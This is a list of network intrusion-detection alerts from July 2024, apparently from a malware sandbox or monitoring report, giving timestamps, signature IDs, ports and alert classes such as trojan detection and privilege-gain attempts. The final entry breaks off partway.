                      Timestamp:07/20/24-23:01:42.571884
                      SID:2027339
                      Source Port:60498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2835222
                      Source Port:40914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.266338
                      SID:2027339
                      Source Port:59852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.511523
                      SID:2027339
                      Source Port:49878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.549328
                      SID:2831300
                      Source Port:52160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.420758
                      SID:2027339
                      Source Port:59858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.651026
                      SID:2829579
                      Source Port:51658
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.627181
                      SID:2027339
                      Source Port:43442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.532849
                      SID:2025132
                      Source Port:32992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.877061
                      SID:2027339
                      Source Port:42084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.054387
                      SID:2835222
                      Source Port:41240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.611005
                      SID:2027339
                      Source Port:42480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.027082
                      SID:2835222
                      Source Port:41772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.374543
                      SID:2027339
                      Source Port:49044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.552279
                      SID:2027339
                      Source Port:51732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633810
                      SID:2835222
                      Source Port:45072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.050503
                      SID:2829579
                      Source Port:53458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.813001
                      SID:2027339
                      Source Port:45390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.519802
                      SID:2831300
                      Source Port:39278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.354322
                      SID:2027339
                      Source Port:42528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:14.686790
                      SID:2027339
                      Source Port:40436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.963339
                      SID:2831300
                      Source Port:40804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.842529
                      SID:2025132
                      Source Port:32888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.222164
                      SID:2829579
                      Source Port:34472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2829579
                      Source Port:54432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.507489
                      SID:2027339
                      Source Port:34838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.616434
                      SID:2831300
                      Source Port:32946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.673065
                      SID:2027339
                      Source Port:36994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976795
                      SID:2835222
                      Source Port:53102
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.974742
                      SID:2027339
                      Source Port:54378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.660516
                      SID:2831300
                      Source Port:51048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.301143
                      SID:2835222
                      Source Port:37048
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.609855
                      SID:2027339
                      Source Port:60378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.790680
                      SID:2025132
                      Source Port:40562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.120513
                      SID:2831300
                      Source Port:36432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.044152
                      SID:2835222
                      Source Port:40310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.378556
                      SID:2027339
                      Source Port:56714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:05.141553
                      SID:2025132
                      Source Port:35296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.019511
                      SID:2025132
                      Source Port:33542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:02.714716
                      SID:2027339
                      Source Port:43626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.444696
                      SID:2025132
                      Source Port:48644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.791502
                      SID:2027339
                      Source Port:55812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.680845
                      SID:2025132
                      Source Port:37798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.383450
                      SID:2025132
                      Source Port:58750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.656128
                      SID:2835222
                      Source Port:41372
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.663162
                      SID:2027339
                      Source Port:33472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.650213
                      SID:2027339
                      Source Port:44102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.866395
                      SID:2027339
                      Source Port:40598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.474436
                      SID:2831300
                      Source Port:54350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.723651
                      SID:2835222
                      Source Port:52594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.991336
                      SID:2835222
                      Source Port:35894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.660608
                      SID:2027339
                      Source Port:53702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.107973
                      SID:2027339
                      Source Port:45408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.565610
                      SID:2831300
                      Source Port:52460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2835222
                      Source Port:46360
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.144955
                      SID:2027339
                      Source Port:33272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.562310
                      SID:2831300
                      Source Port:35350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.500174
                      SID:2027339
                      Source Port:54970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.353592
                      SID:2027339
                      Source Port:49216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221583
                      SID:2829579
                      Source Port:35138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.317774
                      SID:2831300
                      Source Port:57996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.651912
                      SID:2027339
                      Source Port:33732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.143690
                      SID:2027339
                      Source Port:52188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.026812
                      SID:2835222
                      Source Port:48082
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.693187
                      SID:2831300
                      Source Port:46180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.049279
                      SID:2835222
                      Source Port:33762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.621319
                      SID:2025132
                      Source Port:49808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.559170
                      SID:2027339
                      Source Port:45648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.368405
                      SID:2027339
                      Source Port:51762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.520226
                      SID:2027339
                      Source Port:52620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.947006
                      SID:2027339
                      Source Port:48404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.533289
                      SID:2027339
                      Source Port:43528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.445925
                      SID:2831300
                      Source Port:43564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.299284
                      SID:2027339
                      Source Port:39404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.407113
                      SID:2831300
                      Source Port:39946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:02.439009
                      SID:2025132
                      Source Port:56738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.825081
                      SID:2831300
                      Source Port:58076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.023201
                      SID:2831300
                      Source Port:38018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2829579
                      Source Port:46306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.500918
                      SID:2027339
                      Source Port:39794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.940746
                      SID:2027339
                      Source Port:53548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631549
                      SID:2829579
                      Source Port:37214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.476832
                      SID:2027339
                      Source Port:60580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.934977
                      SID:2835222
                      Source Port:50966
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.769670
                      SID:2027339
                      Source Port:38540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.169782
                      SID:2030489
                      Source Port:2466
                      Destination Port:32848
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.807274
                      SID:2831300
                      Source Port:55108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.285038
                      SID:2829579
                      Source Port:40002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.603963
                      SID:2027339
                      Source Port:33514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.745200
                      SID:2027339
                      Source Port:52492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.621030
                      SID:2831300
                      Source Port:40042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.217142
                      SID:2025132
                      Source Port:59288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.629616
                      SID:2831300
                      Source Port:40660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.983105
                      SID:2829579
                      Source Port:45186
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.610618
                      SID:2027339
                      Source Port:39700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.845332
                      SID:2025132
                      Source Port:50558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.660516
                      SID:2025132
                      Source Port:34708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.031510
                      SID:2829579
                      Source Port:48472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.592030
                      SID:2025132
                      Source Port:56472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.775275
                      SID:2025132
                      Source Port:58484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.585790
                      SID:2831300
                      Source Port:54006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.630833
                      SID:2835222
                      Source Port:36586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.287248
                      SID:2027339
                      Source Port:58220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.567236
                      SID:2027339
                      Source Port:57370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.991548
                      SID:2829579
                      Source Port:44798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.952783
                      SID:2829579
                      Source Port:55262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.399866
                      SID:2027339
                      Source Port:34108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.019540
                      SID:2025132
                      Source Port:44750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:48.447182
                      SID:2027339
                      Source Port:60456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.043766
                      SID:2829579
                      Source Port:60040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.163619
                      SID:2835222
                      Source Port:38946
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.632331
                      SID:2027339
                      Source Port:51590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.660099
                      SID:2835222
                      Source Port:52316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.640460
                      SID:2027339
                      Source Port:40204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.761996
                      SID:2025132
                      Source Port:57408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.893328
                      SID:2027339
                      Source Port:45904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.405308
                      SID:2027339
                      Source Port:47414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2835222
                      Source Port:48356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.766239
                      SID:2829579
                      Source Port:38616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.555540
                      SID:2027339
                      Source Port:52378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.955966
                      SID:2027339
                      Source Port:35814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221803
                      SID:2835222
                      Source Port:50602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222279
                      SID:2835222
                      Source Port:34110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.760964
                      SID:2027339
                      Source Port:39610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.596563
                      SID:2831300
                      Source Port:33634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.144931
                      SID:2027339
                      Source Port:51696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.160375
                      SID:2027339
                      Source Port:38964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.994337
                      SID:2829579
                      Source Port:40450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.885298
                      SID:2025132
                      Source Port:49894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.766296
                      SID:2831300
                      Source Port:44980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.855231
                      SID:2027339
                      Source Port:42296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.996055
                      SID:2835222
                      Source Port:32826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2835222
                      Source Port:43828
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.182584
                      SID:2025132
                      Source Port:52454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.527235
                      SID:2027339
                      Source Port:58096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2829579
                      Source Port:60704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2835222
                      Source Port:33952
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.329747
                      SID:2831300
                      Source Port:34040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.639012
                      SID:2829579
                      Source Port:35120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.076036
                      SID:2027339
                      Source Port:54624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.062277
                      SID:2835222
                      Source Port:48014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.649731
                      SID:2829579
                      Source Port:49508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.449569
                      SID:2027339
                      Source Port:48850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.848287
                      SID:2025132
                      Source Port:42276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.342792
                      SID:2025132
                      Source Port:58658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.968363
                      SID:2025132
                      Source Port:37256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.640459
                      SID:2027339
                      Source Port:32958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633984
                      SID:2835222
                      Source Port:36626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.944341
                      SID:2025132
                      Source Port:55426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.805765
                      SID:2831300
                      Source Port:35282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2829579
                      Source Port:50252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.262010
                      SID:2027339
                      Source Port:40798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2829579
                      Source Port:57110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.100332
                      SID:2829579
                      Source Port:60878
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.323644
                      SID:2025132
                      Source Port:53882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.675171
                      SID:2025132
                      Source Port:53096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.727406
                      SID:2831300
                      Source Port:49250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.976649
                      SID:2835222
                      Source Port:40180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.688831
                      SID:2027339
                      Source Port:35844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.014531
                      SID:2027339
                      Source Port:43234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.100332
                      SID:2829579
                      Source Port:46206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.353725
                      SID:2025132
                      Source Port:34064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.452119
                      SID:2027339
                      Source Port:41008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.613164
                      SID:2027339
                      Source Port:57934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.405053
                      SID:2027339
                      Source Port:49608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132511
                      SID:2829579
                      Source Port:53800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2835222
                      Source Port:51976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.951975
                      SID:2835222
                      Source Port:43410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045749
                      SID:2835222
                      Source Port:53856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2829579
                      Source Port:40924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.654988
                      SID:2829579
                      Source Port:45546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220905
                      SID:2829579
                      Source Port:40282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2829579
                      Source Port:37724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.323363
                      SID:2027339
                      Source Port:57652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.488676
                      SID:2027339
                      Source Port:36638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2829579
                      Source Port:51074
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2829579
                      Source Port:37002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.231608
                      SID:2027339
                      Source Port:45954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.415907
                      SID:2027339
                      Source Port:57270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.329969
                      SID:2831300
                      Source Port:39478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.135090
                      SID:2025132
                      Source Port:39010
                      Destination Port:52869
